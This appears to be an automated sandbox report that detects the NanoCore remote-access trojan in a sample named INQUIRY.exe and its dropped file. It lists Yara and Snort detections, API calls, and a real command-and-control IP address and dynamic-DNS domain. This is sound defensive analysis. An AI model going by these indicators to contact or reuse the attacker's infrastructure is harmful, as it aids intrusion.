Source:	Binary string: wntdll.pdbUGP source: INQUIRY.exe, 00000001.00000003.662943536.00000000033B0000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659087283.0000000003220000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.702841984.00000000030F0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.698655774.0000000003280000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.709826822.00000000030E0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.711484064.0000000003270000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INQUIRY.exe, 00000001.00000003.662943536.00000000033B0000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659087283.0000000003220000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.702841984.00000000030F0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000003.00000003.698655774.0000000003280000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.709826822.00000000030E0000.00000004.00000001.sdmp, rstmgknbahw.exe, 00000005.00000003.711484064.0000000003270000.00000004.00000001.sdmp
Source:	Binary string: indows\mscorlib.pdbpdblib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918001760.0000000000807000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: rlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: INQUIRY.exe, 00000002.00000002.918475302.00000000025C7000.00000004.00000040.sdmp

Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_00405D7C FindFirstFileA,FindClose,	1_2_00405D7C
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_004053AA
Source: C:\Users\user\Desktop\INQUIRY.exe	Code function: 1_2_00402630 FindFirstFileA,	1_2_00402630
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_2_00404A29 FindFirstFileExW,	4_2_00404A29
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 4_1_00404A29 FindFirstFileExW,	4_1_00404A29
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_00405D7C FindFirstFileA,FindClose,	5_2_00405D7C
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004053AA
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 5_2_00402630 FindFirstFileA,	5_2_00402630
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_2_00404A29 FindFirstFileExW,	6_2_00404A29
Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe	Code function: 6_1_00404A29 FindFirstFileExW,	6_1_00404A29

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49735 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49742 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49743 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49750 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49757 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49760 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49767 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49774 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49777 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49778 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49779 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49782 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49788 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49789 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49791 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49792 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49810 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49827 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49831 -> 185.140.53.6:4141
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49833 -> 185.140.53.6:4141

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: onyeoma.ddns.net
Source: Malware configuration extractor	URLs: 127.0.0.1

Uses dynamic DNS services

Source: unknown

DNS query: name: onyeoma.ddns.net

Source: Joe Sandbox View

ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

Source: Joe Sandbox View

IP Address: 185.140.53.6 185.140.53.6

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 185.140.53.6:4141

Source: rstmgknbahw.exe, rstmgknbahw.exe, 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmp, rstmgknbahw.exe, 00000005.00000000.695461777.0000000000409000.00000008.00020000.sdmp, rstmgknbahw.exe, 00000006.00000000.707759536.0000000000409000.00000008.00020000.sdmp, INQUIRY.exe, rstmgknbahw.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: INQUIRY.exe, rstmgknbahw.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: unknown

DNS traffic detected: queries for: onyeoma.ddns.net

Source: INQUIRY.exe, 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Source: C:\Users\user\Desktop\INQUIRY.exe

Code function: 1_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00404F61

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.49d0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4940000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.638d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.394bfde.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2311458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.24e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22f1458.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.415058.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39a98c0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.2510000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.395543d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.415058.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39adee9.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.6d8d50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2411458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.381bfde.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.24e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 2.0.INQUIRY.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.0.rstmgknbahw.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 3.2.rstmgknbahw.exe.2311458.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.rstmgknbahw.exe.2510000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.3950e14.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.1.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.rstmgknbahw.exe.4980000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.rstmgknbahw.exe.3950e14.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
